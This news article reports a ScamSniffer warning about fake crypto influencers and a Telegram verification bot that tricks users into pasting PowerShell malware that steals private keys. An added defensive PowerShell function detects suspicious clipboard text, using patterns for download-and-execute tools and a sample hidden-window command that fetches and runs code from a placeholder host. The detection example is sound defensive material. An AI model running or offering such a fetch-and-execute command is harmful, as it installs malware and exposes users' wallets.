Scam Sniffer Warns of Fake Influencers and Telegram Bots Spreading Crypto Malware

ScamSniffer, a leading Web3 security firm, has issued a warning about a new scam targeting cryptocurrency users. This sophisticated attack combines fake social media accounts with malicious Telegram bots to deploy cryptocurrency-stealing malware, preying on unsuspecting individuals.
The Scam Process: Fake Influencers and Malicious Telegram Bots
The scam begins with bad actors creating fake X (formerly Twitter) accounts that mimic well-known cryptocurrency influencers. These fake accounts promote Telegram groups that promise exclusive investment advice. To further the illusion of legitimacy, the scammers' posts are often linked under the real influencers' accounts.
Once an unsuspecting user clicks the invite link and joins the Telegram group, they are prompted to verify their identity using a Telegram verification bot called “OfficialSafeguardBot.” This bot attempts to create a sense of urgency by giving users a limited amount of time to complete a captcha.
During this process, however, the bot places malicious PowerShell code on the victim's clipboard (PowerShell is a scripting language often used for task automation in Windows). The bot then instructs the user to execute this code under the guise of a necessary verification step. Victims who comply unknowingly run the malicious code on their own system, allowing the malware to steal sensitive data, including private keys.
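As an added illustration (not part of ScamSniffer's report or of this article's sources), the PowerShell function below flags clipboard text that looks like a command rather than a verification code. The function name, the indicator patterns and the sample strings are assumptions constructed for this example.

```powershell
# Added example: heuristic check of clipboard text before it is pasted into a shell.
# The indicator list is an assumption for illustration, not taken from the report.
function Test-ClipboardText {
    param([Parameter(Mandatory)][AllowEmptyString()][string]$Text)

    $indicators = [ordered]@{
        'PowerShell launcher'     = '(?i)\b(powershell|pwsh)(\.exe)?\b'
        'Encoded command switch'  = '(?i)\s-e[a-z]*\s+[A-Za-z0-9+/=]{20,}'
        'Hidden window switch'    = '(?i)\s-w[a-z]*\s+h(idden)?\b'
        'Execute downloaded text' = '(?i)\b(iex|invoke-expression)\b'
        'Web download'            = '(?i)\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile)\b'
        'Other script host'       = '(?i)\b(mshta|wscript|cscript)(\.exe)?\b'
    }

    # Collect the name of every indicator whose pattern matches the text.
    $hits = foreach ($name in $indicators.Keys) {
        if ($Text -match $indicators[$name]) { $name }
    }

    [pscustomobject]@{
        Suspicious = [bool]$hits
        Indicators = @($hits)
    }
}

# Constructed samples (example.invalid is a reserved, non-resolving name).
$samples = @(
    'powershell -w hidden -c "iex (irm https://example.invalid/verify)"',
    'Verification code: 482913'
)
foreach ($s in $samples) {
    $r = Test-ClipboardText -Text $s
    '{0,-5} [{1}] {2}' -f $r.Suspicious, ($r.Indicators -join ', '), $s
}

# On a Windows desktop, check the live clipboard before pasting anything:
# Test-ClipboardText -Text (Get-Clipboard -Raw)
```

A genuine CAPTCHA or verification step never needs a command on the clipboard, so any hit here is a reason to stop and not paste.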
Malware’s Impact and Evasion Techniques
ScamSniffer reports that this malware has already stolen private keys from numerous victims, with the malicious code evading detection by several antivirus programs. Only VirusTotal, a popular malware scanning service, has flagged the attack as harmful.
To protect themselves from such scams, ScamSniffer advises users to rely on hardware wallets, avoid running unknown commands, and refrain from installing unverified software.
Surge in Impersonation and Scams
This latest warning follows ScamSniffer’s earlier alert in December regarding an increase in fake X accounts. Impersonation scams have spiked by over 87% since November, with some victims losing upwards of $3 million by clicking on malicious links shared by these fake accounts.
The rise in crypto scams coincides with the ongoing surge in Bitcoin’s price and a broader increase in altcoin investments. As the cryptocurrency market grows in value, it has become an increasingly attractive target for scammers.
Other Recent Malware Threats
In addition to the Telegram-based attack, Cado Security Labs flagged a new strain of malware known as "Realst" on December 9. This malware infiltrates users' systems through a fake meeting application, luring victims into believing they need to download it for a legitimate business opportunity or communication with a trusted contact. Once installed, the malware steals crypto assets, credentials, banking card details, and other sensitive information.
Earlier in October, Radiant Capital, a decentralized finance protocol, suffered a significant breach, losing over $50 million. The attack involved social engineering tactics, with an infected PDF file promoted via Telegram by an attacker impersonating a trusted contractor.
How to Stay Safe
As cybercriminals continue to target the cryptocurrency sector, users are urged to stay vigilant. Avoid clicking on suspicious links, be cautious about downloading unverified software, and always verify the legitimacy of platforms and services before engaging in any transactions. The rise in sophisticated scams and malware highlights the growing need for enhanced security measures in the digital asset space.